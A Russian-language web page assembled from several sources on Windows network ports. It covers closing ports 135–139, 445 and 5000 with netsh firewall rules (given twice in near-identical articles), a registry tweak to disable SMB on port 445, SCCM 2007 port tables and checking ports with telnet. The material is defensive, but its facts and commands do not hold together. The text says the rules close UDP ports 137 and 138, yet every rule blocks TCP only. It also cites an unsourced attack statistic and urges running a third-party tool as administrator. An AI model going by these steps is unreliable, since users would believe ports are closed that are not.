* Использования других значений (кроме 0x0 или 0x20) может вызвать сбой в работе службы маршрутизации и удаленного доступа.
* Чтобы изменения вступили в силу, необходимо перезагрузить компьютер.
Информация в данной статье относится к следующим продуктам.
* Windows Vista Enterprise
* Windows Vista Enterprise 64-bit edition
* Windows Vista Home Basic 64-bit edition
* Windows Vista Home Premium 64-bit edition
* Windows Vista Ultimate 64-bit edition
* Windows Vista Business
* Windows Vista Business 64-bit edition
* Windows Vista Home Basic
* Windows Vista Home Premium
* Windows Vista Starter
* Windows Vista Ultimate
* Windows 7 Enterprise
* Windows 7 Home Basic
* Windows 7 Home Premium
* Windows 7 Professional
* Windows 7 Ultimate
* Windows Server 2008 R2 Datacenter
* Windows Server 2008 R2 Enterprise
* Windows Server 2008 R2 Standard
* Windows Server 2008 Datacenter
* Windows Server 2008 Enterprise
* Windows Server 2008 Standard

Источник — http://support.microsoft.com/kb/929852

После отключения и перезагрузки у вас из списка, получаемого командой ipconfig /all исчезнет куча лишних строк и останутся только хорошо известные вам интерфейсы.

Обратное включение выполняется простым удалением созданного ключа из реестра или заменой значения на «0» с последующей перезагрузкой.

Чаще всего заражаются компьютеры, работающие на ОС Windows любых версий, будь то 7, 8, 10 или любая другая. Главная причина такой статистики – входящие подключения к ПК или «порты», которые являются слабым местом любой системы из-за своей доступности по умолчанию.

Слово «порт» – это термин, подразумевающий порядковый номер входящих подключений, которые направляются на ваш ПК от внешнего программного обеспечения. Часто бывает так, что эти порты используют вирусы, запросто проникающие на ваш компьютер при помощи IP-сети.

Вирусное программное обеспечение, попав в компьютер через такие входящие подключения, быстро заражает все важные файлы, причём не только пользовательские, но и системные. Чтобы этого избежать, мы рекомендуем закрыть все стандартные порты, которые могут стать вашим уязвимым местом при атаке хакеров.

Какие порты у Windows 7-10 самые уязвимые?

Многочисленные исследования и опросы специалистов показывают, что до 80% вредоносных атак и взломов происходили при помощи четырех основных портов, использующихся для быстрого обмена файлами между разными версиями Windows:

TCP порт 139, необходимый для удаленного подключения и управления ПК;
TCP порт 135, предназначенный для выполнения команд;
TCP порт 445, позволяющий быстро передавать файлы;
UDP порт 137, с помощью которого проводится быстрый поиск на ПК.

Закрываем порты 135-139 и 445 в Виндовс

Мы предлагаем вам ознакомиться с самыми простыми способами закрытия портов Виндовс, которые не требуют дополнительных знаний и профессиональных навыков.

Используем командную строку

Командная строка Windows – это программная оболочка, которая используется для задания определенных функций и параметров софту, не имеющему собственной графической оболочки.

Для того чтобы запустить командную строку, необходимо:

Одновременно нажать сочетание клавиш Win+R
В появившейся командной строке ввести CMD
Нажать на кнопку «ОК»

Появится рабочее окно с чёрным фоном, в котором необходимо поочередно вводить нижеприведенные команды. После каждой введенной строчки нажимайте клавишу Enter для подтверждения действия.
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name=»Block1_TCP-135″ (команда для закрытия порта 135)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name=»Block1_TCP-137″ (команда для закрытия порта 137)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name=»Block1_TCP-138″ (команда для закрытия порта 138)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name=»Block_TCP-139″ (команда для закрытия порта 139)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name=»Block_TCP-445″ (команда для закрытия порта 445)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name=»Block_TCP-5000″

Шесть приведенных нами команд необходимы для: закрытия 4х уязвимых TCP-портов Windows (открытых по умолчанию), закрытия UDP-порта 138, а также закрытия порта 5000, который отвечает за выведение списка доступных сервисов.

Закрываем порты сторонними программами

Если вы не хотите тратить время на работу с командной строкой, мы предлагаем вам ознакомиться со сторонними приложениями. Суть такого софта заключается в правке реестра в автоматическом режиме с графическим интерфейсом, без необходимости в ручном введении команд.

По мнению наших пользователей, самой популярной программой для этих целей является Windows Doors Cleaner. Она поможет с лёгкостью закрыть порты на компьютере с ОС Windows 7/8/8.1/10. Более старые версии операционных систем, к сожалению, не поддерживаются.

Как работать с программой, закрывающей порты

Для того чтобы воспользоваться Windows Doors Cleaner, необходимо:

1. Скачать софт и установить его
2. Запустить программу, нажав на ярлык правой кнопкой мыши и выбрав «запустить от имени администратора»
3. В появившемся рабочем окне будет список портов и кнопки «Сlose» или «Disable», которые закрывают уязвимые порты Windows, а также любые другие по желанию
4. После того, как необходимые изменения были внесены, необходимо перезагрузить систему

Ещё одним преимуществом программы является тот факт, что порты с её помощью можно не только закрывать, но и открывать.

Делаем выводы

Закрытие уязвимых сетевых портов в Виндовс – это не панацея от всех бед. Важно помнить, что сетевая безопасность может быть достигнута только комплексными действиями, нацеленными на закрытие всех уязвимостей вашего ПК.

Для безопасности Windows пользователь в обязательном порядке должен устанавливать критические обновления от Microsoft, иметь лицензированных антивирусный софт и включенный файервол, использовать исключительно безопасное программное обеспечение и регулярно читать наши статьи, в которых рассказываем обо всех существующих способах достижения анонимности и безопасности ваших данных.

Вы знаете более удобные способы закрыть сетевые порты? Поделитесь своими знаниями в комментариях и не забывайте репостить статью к себе на страничку. Делитесь полезной информацией со своими друзьями и не дайте хакерам шанса навредить вашим близким!

Как отключить функцию, которая открыла порт 445 на сервере Windows?

Ниже приведена цитата из двух разных источников, которые я использовал для успешного отключения порта 445 на компьютерах с Windows XP. Я закрывал порты 445 и 135, 137 — 139, поэтому я следовал всем инструкциям в статье, и это сработало для меня.

Общая информация о порте 445 (ссылка на архив)

Среди новых портов, используемых Windows 2000, — TCP-порт 445, который используется для SMB через TCP. Протокол SMB (Server Message Block) используется, помимо прочего, для обмена файлами в Windows NT / 2000 / XP. В Windows NT он работал поверх NetBT (NetBIOS через TCP / IP), который использовал известные порты 137, 138 (UDP) и 139 (TCP). В Windows 2000 / XP Microsoft добавила возможность запуска SMB напрямую через TCP / IP, без дополнительного уровня NetBT. Для этого они используют TCP-порт 445.
На самом простом NetBIOS в вашей локальной сети может быть просто необходимым злом для устаревшего программного обеспечения. Однако NetBIOS в вашей глобальной сети или через Интернет представляет собой огромный (читай глупо …) риск для безопасности. Вся информация, такая как ваш домен, имена рабочих групп и систем, а также информация об учетной записи доступна через NetBIOS. В ваших интересах, чтобы NetBIOS никогда не покидал вашу сеть.
Если вы используете многодомный компьютер, то есть более 1 сетевой карты, то вы должны отключить NetBIOS на каждой сетевой карте или Dial-Up Connection в свойствах TCP / IP, которые не являются частью вашей локальной сети.

Как отключить порт 445

Чтобы отключить порт 445:
Добавьте следующий раздел реестра:
Ключ: HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ NetBT \ Имя параметров: SMBDeviceEnabled Тип: DWORD (REG_DWORD) Данные: 0
Не забудьте перезагрузить компьютер после отключения указанных портов для эффекта. Кроме того, чтобы убедиться, что эти порты отключены, вы можете открыть командную строку и набрать netstat -an, чтобы убедиться, что ваш компьютер больше не прослушивает эти порты.

(ключи реестра различаются для Windows 7 и более поздних версий, см. эту статью Microsoft )

За что отвечает 445 порт. Как закрыть уязвимые порты в Windows? Инструкция по работе с программой, закрывающей порты

→ Как закрыть уязвимые порты в Windows?

В мире чуть ли не каждый день десятки компьютеров заражаются опасными вирусами, и всё больше пользователей начинают искать способы повышения безопасности своего персонального компьютера.

Наиболее часто заражаются ПК под управлением операционной системы Windows. Связано это с тем, что большинство вирусов проникают в ОС через определенные входящие подключения, так называемые «порты», которые, к сожалению, являются включёнными по умолчанию.

Несколько упрощая, понятие «порт» можно определить как номер входящего подключения внешних программ (в том числе и вирусов) к вашему компьютеру через IP-сеть. Каждому порту присваивается уникальный номер для определения единственно возможного получателя данных в операционной системе.

Проникнув в компьютер, вирусы начинают заражать данные пользователя и открывают все ранее закрытые порты Виндовс для более быстрого распространения по системе. Чтобы этого не произошло, необходимо блокировать самые уязвимые порты, тем самым предотвратив возможность заражения и подняв безопасность Windows на уровень выше.

Самые уязвимые порты Windows 7 – 10

TCP порт 445 (он используется для обмена файлами)
TCP порт 139 (предназначен для удаленного подключения к компьютеру)
UDP порт 137 (служит для поиска информации на других компьютерах)
TCP порт 135 (через него выполняются задания команд)

Как закрыть порты с 135 по 139 и 445 в Windows?

Есть множество вариантов закрытия портов Виндовс, но в статье мы рассмотрим самые простые способы это сделать.

Способ 1 – использование командной строки

Командная строка Windows используется для задания значений тем настройкам системы, у которых нет графического интерфейса. К таковым функциям и относятся рассматриваемые открытые порты подключений.

Командная строка запускается в несколько этапов:

Нажмите сочетание клавиш Win+R
В появившемся окне выполнения команд наберите CMD
Нажмите «ОК»

Перед вами появится окно с черным фоном. По очереди скопируйте в него представленные ниже строчки и нажмите клавишу ввода:

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name=»Block1_TCP-135″

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name=»Block1_TCP-137″

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name=»Block1_TCP-138″

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name=»Block_TCP-139″ (команда помогает закрыть порт 139)

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name=»Block_TCP-445″ (команда помогает закрыть порт 445)

netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name=»Block_TCP-5000″

Эти шесть команд закрывают 4 перечисленных выше самых опасных открытых порта Windows, а также порт 5000, отвечающий за обнаружение открытых сервисов, и UDP порт 138 разрешения имен NetBIOS.

Способ 2 – использование сторонних программ

Чтобы не использовать ручную работу с командной строкой, можно использовать стороннее программное обеспечение. Суть его работы сводится к такой же правке реестра, как в способе выше, только в визуальном отображении.

Инструкция по работе с программой, закрывающей порты

1. 1. Скачайте и установите программу

1. 2. Установленную программу необходимо запустить с правами администратора

1. 3. В появившемся окне при нажатии кнопок «Сlose» или «Disable» отключаются и закрываются все уязвимые порты Windows

Важно отметить, что с помощью этой программы можно не только закрыть, но и открыть порты.

Заключение

Помимо закрытия самых опасных сетевых портов компьютера необходимо не забывать, что этими действиями не достигается максимальная безопасность для операционной системы.

На вашей Windows необходимо устанавливать присылаемые Microsoft критические пакеты обновлений, антивирусные программы, безопасные браузеры и другое ПО, повышающее безопасность и анонимность.

Предлагаем обсудить в комментариях тему защиты сетевых портов и делиться полезными методами повышения конфиденциальности. Не забудьте отправить ссылку на эту статью вашим друзьям, чтобы они тоже знали, как закрыть открытые порты Windows.

Посмотрите также наше видео, где мы более подробно рассказываем о том, как закрыть уязвимые порты:

Какие порты у Windows 7-10 самые уязвимые?

TCP порт 139, необходимый для удаленного подключения и управления ПК;
TCP порт 135, предназначенный для выполнения команд;
TCP порт 445, позволяющий быстро передавать файлы;
UDP порт 137, с помощью которого проводится быстрый поиск на ПК.

Закрываем порты 135-139 и 445 в Виндовс

Используем командную строку

Для того чтобы запустить командную строку, необходимо:

Одновременно нажать сочетание клавиш Win+R
В появившейся командной строке ввести CMD
Нажать на кнопку «ОК»

Закрываем порты сторонними программами

Как работать с программой, закрывающей порты

Для того чтобы воспользоваться Windows Doors Cleaner, необходимо:

Делаем выводы

Публикация

Порты, используемые программой Configuration Manager

Microsoft System Center Configuration Manager 2007 — это распределенная система клиент-сервер. Распределенная природа Configuration Manager 2007 означает, что подключения могут создаваться между серверами сайта, системами сайта и клиентами. В некоторых подключениях используются порты без возможности настройки, а в некоторых — с возможностью настройки. При использовании каких-либо технологий фильтрации портов, таких как брандмауэры, маршрутизаторы, прокси-серверы и IPsec, необходимо проверить, что требуемые порты доступны.

Configuration Manager 2007 позволяет настроить порты для связи следующих типов.

Между клиентом и системой сайта
Между клиентом и Интернетом (как параметры прокси-сервера)
Между точкой обновления программного обеспечения и Интернетом (как параметры прокси-сервера)
Между точкой обновления программного обеспечения и сервером WSUS
Между клиентом и точкой формирования отчетов

Портом HTTP, который служит для связи клиента с системой сайта, по умолчанию является порт 80, а портом HTTPS по умолчанию является порт 443. Порты для связи клиента системой сайта через HTTP или HTTPS можно изменить в разделах «Установка» или «Свойства сайта» для сайта Configuration Manager.

Роли системы сайта точки формирования отчетов содержат настраиваемые параметры порта для связи HTTP и HTTPS, определенные на странице свойств роли системы сайта точки формирования отчетов. По умолчанию пользователи подключаются к точке формирования отчетов при помощи HTTP-порта 80 и HTTPS-порта 443. Эти порты определяются только во время установки. Для переопределения порта связи для точки формирования отчетов необходимо удалить систему сайта точки формирования отчетов, а затем установить ее повторно.

Configuration Manager не позволяет настроить порты для связи следующих типов.

Между сайтами (основной-основной или основной-дополнительный)
Между сервером сайта и системой сайта
Между сервером сайта и сервером базы данных сайта
Между системой сайта и сервером базы данных сайта
Между консолью Configuration Manager 2007 и поставщиком SMS
Между консолью Configuration Manager 2007 и Интернетом

Следующие списки портов используются в Configuration Manager 2007 и не включают данные о стандартных службах Windows, например параметры групповой политики Active Directory и проверка подлинности Kerberos. Сведения о портах и службах Windows Server см. по адресу http://go.microsoft.com/fwlink/?LinkID=123652.

На следующем рисунке показаны подключения между компьютерами Configuration Manager 2007. Номер ссылки соответствует таблице, в которой перечислены порты для этой ссылки. Стрелки между компьютерами представляют направление связи.

— > указывает, что один компьютер инициирует связь, а другой всегда отвечает;
< — > указывает, что любой компьютер может инициировать связь

1. Сервер сайта < — > сервер сайта

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445
Протокол PPTP	—	1723 (см. примечание 3, Отправитель RAS)

2. Сервер основного сайта — > контроллер домена

Описание	Протокол UDP	Протокол TCP
Протокол LDAP	—	389
Протокол LDAP (соединение по протоколу SSL)	636	636
Глобальный каталог LDAP	—	3268
Глобальный каталог LDAP SSL	—	3269
Сопоставитель конечных точек RPC	135	135
RPC	—	DYNAMIC

3. Сервер сайта < — > точка обновления программного обеспечения

(См. примечание 6, Передача данных между сервером сайта и системами сайта)

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445
Протокол HTTP	—	80 или 8530 (см. примечание 4, Службы обновлений Windows Server)
Протокол HTTPS	—	443 или 8531 (см. примечание 4, Службы обновлений Windows Server)

4. Точка обновления программного обеспечения — > Интернет

Описание	Протокол UDP	Протокол TCP
Протокол HTTP	—	80 (см. примечание 1, Порт прокси-сервера)

5. Сервер сайта < — > точка миграции состояния

(См. примечание 6, Передача данных между сервером сайта и системами сайта)

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445
Сопоставитель конечных точек RPC	135	135

6. Клиент — > точка обновления программного обеспечения

Описание	Протокол UDP	Протокол TCP
Протокол HTTP	—	80 или 8530 (см. примечание 4, Службы обновлений Windows Server)
Протокол HTTPS	—	443 или 8531 (см. примечание 4, Службы обновлений Windows Server)

7. Клиент — > точка миграции состояния

Описание	Протокол UDP	Протокол TCP
Протокол HTTP	—	80 (см. примечание 2, Доступен альтернативный порт)
Протокол HTTPS	—	443 (см. примечание 2, Доступен альтернативный порт)
Протокол SMB	—	445

8. Клиент — > точка обслуживания PXE

Описание	Протокол UDP	Протокол TCP
Протокол DHCP	67 и 68	—
Протокол TFTP	69 (см. примечание 5, Управляющая программа TFTP)	—
Протокол BINL	4011	—

9. Сервер сайта < — > точка обслуживания PXE

(См. примечание 6, Передача данных между сервером сайта и системами сайта)

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	DYNAMIC

10. Сервер сайта < — > средство проверки работоспособности системы

(См. примечание 6, Передача данных между сервером сайта и системами сайта)

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	DYNAMIC

11. Клиент — > средство проверки работоспособности системы

Для клиента требуются порты установленные клиентом защиты доступа к сети Windows, который зависит от типа используемого клиента усиления. Например, в системе ограничений DHCP будут использоваться порты UDP 67 и 68. Система ограничений IPsec будет использовать порты TCP 80 или 443 для связи с центром регистрации работоспособности, порт UDP 500 — для согласований IPsec и необходимы дополнительные порты для фильтров IPsec. Дополнительные сведения см. в документации по защите доступа к сети Windows. Справку по настройке брандмауэров для IPsec см. в разделе http://go.microsoft.com/fwlink/?LinkId=109499.

12. Сервер сайта < — > резервная точка состояния

(См. примечание 6, Передача данных между сервером сайта и системами сайта)

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	DYNAMIC

13. Клиент — > резервная точка состояния

Описание	Протокол UDP	Протокол TCP
Протокол HTTP	—	80 (см. примечание 2, Доступен альтернативный порт)

14. Сервер сайта — > точка распространения

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	DYNAMIC

15. Клиент — > точка распространения

Описание	Протокол UDP	Протокол TCP
Протокол HTTP	—	80 (см. примечание 2, Доступен альтернативный порт)
Протокол HTTPS	—	443 (см. примечание 2, Доступен альтернативный порт)
Протокол SMB	—	445
Протокол многоадресной рассылки	63000-64000	—

16. Клиент — > точка распространения филиала

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445

17. Клиент — > точка управления

Описание	Протокол UDP	Протокол TCP
Протокол HTTP	—	80 (см. примечание 2, Доступен альтернативный порт)
Протокол HTTPS	—	443 (см. примечание 2, Доступен альтернативный порт)

18. Клиент — > точка обнаружения серверов

Описание	Протокол UDP	Протокол TCP
Протокол HTTP	—	80 (см. примечание 2, Доступен альтернативный порт)

19. Точка распространения филиала — > точка распространения

Описание	Протокол UDP	Протокол TCP
Протокол HTTP	—	80 (см. примечание 2, Доступен альтернативный порт)
Протокол HTTPS	—	443 (см. примечание 2, Доступен альтернативный порт)

20. Сервер сайта — > поставщик

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	DYNAMIC

21. Точка обнаружения серверов — > Microsoft SQL Server

Описание	Протокол UDP	Протокол TCP
SQL через TCP	—	1433

22. Точка управления — > сервер SQL Server

Описание	Протокол UDP	Протокол TCP
SQL через TCP	—	1433

23. Поставщик — > SQL Server

Описание	Протокол UDP	Протокол TCP
SQL через TCP	—	1433

24. Точка формирования отчетов — > SQL Server / точка служб отчетов — > SQL Server

Точка формирования отчетов и точка служб отчетов используют один порт. Точка служб отчетов доступна только для Configuration Manager 2007 R2.

Описание	Протокол UDP	Протокол TCP
SQL через TCP	—	1433

25. Консоль Configuration Manager — > точка формирования отчетов

Описание	Протокол UDP	Протокол TCP
Протокол HTTP	—	80 (см. примечание 2, Доступен альтернативный порт)
Протокол HTTPS	—	443 (см. примечание 2, Доступен альтернативный порт)

26. Консоль Configuration Manager — > поставщик

Описание	Протокол UDP	Протокол TCP
Сопоставитель конечных точек RPC	135	135
RPC	—	DYNAMIC

27. Консоль Configuration Manager — > Интернет

Описание	Протокол UDP	Протокол TCP
Протокол HTTP	—	80

28. Основной сервер сайта — > сервер SQL Server

Описание	Протокол UDP	Протокол TCP
SQL через TCP	—	1433

29. Точка управления — > контроллер домена

Описание	Протокол UDP	Протокол TCP
Протокол LDAP	—	389
Протокол LDAP (соединение по протоколу SSL)	636	636
Глобальный каталог LDAP	—	3268
Глобальный каталог LDAP SSL	—	3269
Сопоставитель конечных точек RPC	135	135
RPC	—	DYNAMIC

30. Сервер сайта — > точка формирования отчетов / сервер сайта — > точка служб отчетов

Точка формирования отчетов и точка служб отчетов используют один порт. Точка служб отчетов имеется только в Configuration Manager 2007 R2.

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	DYNAMIC

31. Сервер сайта — > точка обнаружения серверов

(См. примечание 6, Передача данных между сервером сайта и системами сайта)

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	DYNAMIC

32. Консоль Configuration Manager — > сервер сайта

Описание	Протокол UDP	Протокол TCP
RPC (исходное соединение с WMI для поиска системы поставщика)	—	135

33. Точка обновления программного обеспечения — > сервер синхронизации WSUS

Описание	Протокол UDP	Протокол TCP
Протокол HTTP	—	80 или 8530 (см. примечание 4, Службы обновлений Windows Server)
Протокол HTTPS	—	443 или 8531 (см. примечание 4, Службы обновлений Windows Server)

34. Консоль Configuration Manager — > клиент

Описание	Протокол UDP	Протокол TCP
Удаленное управление (элемент управления)	2701	2701
Удаленное управление (данные)	2702	2702
Удаленное управление (сопоставитель конечных точек RPC)	—	135
Удаленный помощник (RDP и RTC)	—	3389

35. Точка управления < — > сервер сайта

(См. примечание 6, Передача данных между сервером сайта и системами сайта)

Описание	Протокол UDP	Протокол TCP
Сопоставитель конечных точек RPC	—	135
RPC	—	DYNAMIC
Протокол SMB	—	445

36. Сервер сайта — > клиент

Описание	Протокол UDP	Протокол TCP
Пробуждение по локальной сети	9 (см. примечание 2, Доступен альтернативный порт)	—

37. Клиент Configuration Manager — > контроллер домена глобального каталога

Клиент Configuration Manager не обращается к серверу глобального каталога, когда он является компьютером рабочей группы или настроен для связи только с Интернетом.

Описание	Протокол UDP	Протокол TCP
Глобальный каталог LDAP	—	3268
Глобальный каталог LDAP SSL	—	3269

38. Точка обслуживания PXE — > сервер SQL Server

Описание	Протокол UDP	Протокол TCP
SQL через TCP	—	1433

39. Сервер сайта < — > точка синхронизации Аналитики активов (Configuration Manager 2007 SP1)

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	DYNAMIC

40. Точка синхронизации Аналитики активов < — > веб-сайт System Center в сети (Configuration Manager 2007 SP1)

Описание	Протокол UDP	Протокол TCP
Протокол HTTPS	—	443

41. Точка распространения с поддержкой многоадресной рассылки — > SQL Server (Configuration Manager 2007 R2)

Описание	Протокол UDP	Протокол TCP
SQL через TCP	—	1433

42. Узел службы отчетов о состоянии клиента —> клиент (Configuration Manager 2007 R2)

Описание

Протокол UDP

Протокол TCP

Сопоставитель конечных точек RPC

135

RPC

—

DYNAMIC

ICMPv4 тип 8 (проверка связи) или

ICMPv6 тип 128 (запрос проверки связи)

Неприменимо

43. Узел службы отчетов о состоянии клиента —> точка управления (Configuration Manager 2007 R2)

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445
Служба сеанса NetBIOS	—	139

44. Узел службы отчетов о состоянии клиента — > SQL Server (Configuration Manager 2007 R2)

Описание	Протокол UDP	Протокол TCP
SQL через TCP	—	1433

45. Сервер сайта < — > точка служб отчетов (Configuration Manager 2007 R2)

(См. примечание 6, Передача данных между сервером сайта и системами сайта)

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	DYNAMIC

46. Консоль Configuration Manager — > точка служб отчетов (Configuration Manager 2007 R2)

Описание	Протокол UDP	Протокол TCP
Протокол HTTP	—	80 (см. примечание 2, Доступен альтернативный порт)
Протокол HTTPS	—	443 (см. примечание 2, Доступен альтернативный порт)

47. Точка служб отчетов — > SQL Server (Configuration Manager 2007 R2)

Описание	Протокол UDP	Протокол TCP
SQL через TCP	—	1433

Примечания

1 Порт прокси-сервера Этот порт невозможно настроить, но можно маршрутизировать через настроенный прокси-сервер.

2 Доступен альтернативный порт Для этого значения в Configuration Manager можно определить альтернативный порт. Если задан специальный порт, замените этот специальный порт при определении информации IP-фильтра для политик IPsec или при настройке брандмауэров.

3 Отправитель RAS Configuration Manager 2007 также может использовать отправитель RAS совместно с протоколом PPTP для передачи и приема через брандмауэр административных данных, сведений о клиенте и сайте Configuration Manager 2007. При этих обстоятельствах используется порт 1723 PPTP TCP.

4 Службы обновления Windows Server WSUS можно установить на веб-сайт по умолчанию (порт 80) или на пользовательский веб-сайт (порт 8530).

После установки порт можно изменить. Нет необходимости использовать один номер порта во всей иерархии сайтов.

Если для HTTP используется порт 80, для HTTPS необходимо использовать порт 443.

Если используется другой HTTP-порт (например 8530), номер HTTPS-порта должен быть больше на 1 (8531).

5 Управляющая программа TFTP Служба системы управляющей программы TFTP является составной частью службы развертывания Windows, и для нее не требуется имя пользователя или пароль. Служба управляющей программы TFTP реализует поддержку протокола TFTP, определенного следующими RFC:

RFC 350 — TFTP,
RFC 2347 — расширение параметра,
RFC 2348 — размер блока,
RFC 2349 — интервал времени ожидания и размер передачи.

Протокол TFTP предназначен для поддержки бездисковой загрузки. Управляющие программы TFTP ожидают передачи данных через порт UDP 69, но отвечают через динамически выделяемый верхний порт. Поэтому включение этого порта разрешит службе TFTP принимать входящие запросы TFTP, но не разрешит выбранному серверу отвечать на эти запросы. Невозможно разрешить выбранному серверу отвечать на входящие запросы TFTP, если сервер TFTP не настроен на ответ через порт 69.

6 Передача данных между сервером сайта и системами сайта По умолчанию передача данных между сервером сайта и системами сайта является двунаправленной. Сервер сайта инициирует связь для настройки системы сайта, а затем большинство систем сайта вновь подключаются к серверу сайта для передачи информации о состоянии. Точки формирования отчета и точки распространения не передают информации о состоянии. Если в свойствах системы сайта установлен флажок Разрешить только инициированные сервером сайта передачи данных из этой системы сайта, система сайта никогда не инициирует восстановление связи с сервером сайта.

7 Порты, используемые точками распространения для потоковой передачи виртуализации приложения Точку распространения с поддержкой потоковой передачи виртуализации приложения можно настроить на использование протокола HTTP или HTTPS. Эта возможность доступна только в Configuration Manager 2007 R2.

Порты удаленного управления Configuration Manager

При работе NetBIOS через TCP/IP для удаленного управления Configuration Manager 2007 используются порты, описанные в следующей таблице.

Описание	Протокол UDP	Протокол TCP
Сопоставление конечных точек RPC	—	135
Разрешение имен	137	—
Обмен сообщениями	138	—
Сеансы клиента	—	139

Порты внешнего управления AMT (Configuration Manager 2007 SP1)

При использовании внешнего управления в Configuration Manager 2007 SP1 используются следующие порты.

A. Сервер сайта <—> внешняя точка обслуживания

Описание	Протокол UDP	Протокол TCP
Протокол SMB	—	445
Сопоставитель конечных точек RPC	135	135
RPC	—	DYNAMIC

B. Контроллер управления AMT —> внешняя точка обслуживания

Описание	Протокол UDP	Протокол TCP
Внешняя подготовка (неприменимо для внутренней подготовки)	—	9971 (с возможностью настройки)

C. Внешняя точка обслуживания —> контроллер управления AMT

Описание	Протокол UDP	Протокол TCP
Обнаружение	—	16992
Управление питанием, подготовка и обнаружение	—	16993

D. Консоль внешнего управления —> Контроллер управления AMT

Описание	Протокол UDP	Протокол TCP
Общие задачи управления	—	16993
Перенаправление IDE и последовательная передача по локальной сети	—	16995

Порты, используемые при установке клиента Configuration Manager

Порты, используемые сервером Windows Server

В следующей таблице перечислены некоторые ключевые порты, используемые Windows Server, и связанные с ними функции. Более полный список служб Windows Server и требований к сетевым портам см. по адресу http://go.microsoft.com/fwlink/?LinkID=123652.

Описание	Протокол UDP	Протокол TCP
Служба доменных имен (DNS)	53	—
Протокол DHCP	67 и 68	—
Разрешение NetBIOS-имен	137	—
Служба датаграмм NetBIOS	138	—
Служба сеанса NetBIOS	—	139

Соединение с Microsoft SQL Server

Если используется сетевая библиотека TCP/IP, включите порт 1433 в брандмауэре. Используйте файл Hosts или строку дополнительного подключения для разрешения имени узла.

Если используются именованные каналы через TCP/IP, включите порт 139 для функций NetBIOS. NetBIOS следует использовать только для устранения неполадок Kerberos.

Примечание

Протокол TCP/IP необходим для использования при установлении сетевого соединения проверки подлинности Kerberos. Связь по именованным каналам не требуется для операций базы данных сайта Configuration Manager 2007 и должна использоваться только для устранения неполадок с проверкой подлинности Kerberos.

Стандартный экземпляр SQL Server использует TCP-порт 1433 для передачи данных по сети. При использовании именованного экземпляра номер порта назначается динамически. Configuration Manager не поддерживает задание и изменение номера порта как для стандартного, так и для именованного экземпляра SQL Server, в ручном режиме.

Включать порты UDP 137 и 138 для разрешения имен NetBIOS с помощью широковещательного узла (B-node) не рекомендуется. Вместо этого для разрешения имен можно использовать сервер WINS или файл LMHOSTS.

Требования к установке для интернет-систем сайтов

Интернет-точка управления, точка обновления программного обеспечения и резервная точка состояния для установки и восстановления используют следующие порты.

Сервер сайта —> система сайта: сопоставитель конечных точек RPC с использованием порта 135 UDP и TCP.
Сервер сайта —> система сайта: динамические TCP-порты RPC.
Сервер сайта < —> система сайта: Протокол SMB с использованием порта 445 TCP.

Точки распространения не устанавливаются, пока на них не будет направлен первый пакет. Для установки пакетов в точках распространения требуются следующие порты RPC.

Сервер сайта —> точка распространения: сопоставитель конечных точек RPC с использованием порта 135 UDP и TCP.
Сервер сайта —> точка распространения: динамические TCP-порты RPC.

Используйте протокол IPSec для защиты обмена данными между сервером сайта и системами сайта. Если необходимо ограничить динамические порты, используемые RPC, можно использовать средство настройки RPC (Майкрософт) (rpccfg.exe) для настройки ограниченного диапазона портов для передачи пакетов RPC. Дополнительные сведения о средстве настройки RPC см. по адресу http://go.microsoft.com/fwlink/?LinkId=124096.

Важно!

Перед установкой этих систем сайта проверьте, что на сервере системы сайта запущена служба удаленного реестра и что указана учетная запись установки системы сайта, если система сайта находится в другом лесу Active Directory без отношений доверия. Дополнительные сведения см. в разделе Настройка учетной записи установки системы сайта.

Решено: Как проверить командой telnet, открыт ли порт, Как пользоваться ping и traceroute

Telnet — это утилита, с помощью которой можно соединиться с удалённым портом любого компьютера и установить канал связи.

Важно: в Windows Vista и Windows 7/8/10 утилита telnet по умолчанию отключена. Вы можете установить утилиту по инструкции от Microsoft.

1.
Нажмите Пуск или сочетание клавиш Win + R.
2.
В поле поиска введите «cmd» и нажмите кнопку ОК.
3.
В командной строке введите команду:
telnet имя_сервера номер_порта
или:
telnet IP_сервера номер_порта

1.
Запустите терминал. Для этого в поисковой строке введите слово «Терминал» или нажмите комбинацию клавиш Ctrl+Alt+T.
2.
Установите утилиту telnet:
sudo apt install telnet
3.
В терминале введите команду:
telnet имя_сервера номер_порта
или:
telnet IP_сервера номер_порта

Если командная строка или терминал возвращает ошибку, то порт закрыт:

Если окно становится полностью пустым или на экране появляется приглашение сервера, порт открыт:

